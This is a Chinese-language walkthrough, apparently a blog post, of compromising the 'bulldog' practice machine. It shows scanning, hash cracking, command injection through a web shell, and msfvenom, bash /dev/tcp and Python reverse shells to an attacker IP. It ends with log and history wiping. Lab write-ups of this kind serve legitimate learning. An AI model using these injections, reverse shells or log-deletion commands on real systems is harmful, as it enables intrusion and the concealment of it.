bulldog

信息收集

扫描主机存货确定ip

netdiscover -i wlan0 -r 192.168.0.0/24

查找到ip为192.168.0.105

然后nmap扫描

nmap -sC -sV 192.168.0.105

发现80,8080,23的远程连接

在80端口没有发现重要信息

目录扫描

dirb http://192.168.0.105

发现最初的三个目录

/admin
/dev
/robots.txt

查看各种进行

发现/admin

尝试弱口令爆破没出来,sql注入,虽然没验证码,但是

image-20210817220829749

说明密码的复杂性

所以换条路

看robots.txt

发现图像

image-20210817220918897

翻译发现...

第一个是getman shepherd ,意思是德国牧羊犬

第二个 hack team...没意思,以为是工具

啥也不是,从dev下手

从源码查看,有注释

image-20210817221247422

然后cmd5和md5的网站破解两个

最后两个

nick@bulldogindustries.com bulldog

sarah@bulldogindustries.com bulldoglover

登陆失败,再用光人物名,登录nick成功

入侵尝试

额,返回之前的websehll页面,因为已经登陆了,带有cookie性的登陆成功那个页面,发现多条&输入并执行

然后尝试远程下载python脚本

image-20210817224559223

因为这个里面显示了编程语言脚本

msfvenom -p cmd/unix/reverse_python LHOST=192.168.0.104 LPORT=8800 -f raw > shell.py

然后上传到kali的下

然后开启apache服务

然后执行命令

ls&&wget 192.168.0.104/shell.py

image-20210817224954231

设置msf的handler监听

进行相关的payload的配置和ip、端口后

进行run

emm

但发现监听总是成功不了,可能因为msf的生成文件问题,然后就用bash在网上搜的

ls &&echo "bash -i >& /dev/tcp/192.168.0.104/8800 0>&1" | bash&pwd

这个也邢

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.56.102",1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])

那就用nc

nc -lvp 8800

image-20210818090836682

探测

找用户身份和密码

cat /etc/passwd

因为根据之前的网站,找相关的

bulldog,django

发现

bulldogadmin,django

先进bulldogadmin

然后ls -alh

发现

隐藏文件查看后

一个提示,一个乱码

所以使用乱码的不用cat,用string

string customPermissionAPP
strings命令用来提取和显示非文本文件中的文本字符串

发现冗余的密码,多了H,去掉

然后

找到密码

启动切换管理身份

不知道管理身份是谁

试了很多

...

看了一个大佬的帖子

发现python调用本地shell

python -c ‘import pty; pty.spawn("/bin/bash")’

然后ls

发现flag

清理

rm  -rf /var/log
find / -name history 
然后定位到history
然后echo "">history
然后再histroy -c

这个清理有点上头了,瞎胡写的,后期会再单写一篇,23333
这一个有点简单了.
因为kali安装自己电脑当系统了,所以没图片,233
参考:
群里的文件

别人都在不停的努力,自己又怎么会停
原文地址:https://www.cnblogs.com/chenyouxiu/p/15155611.html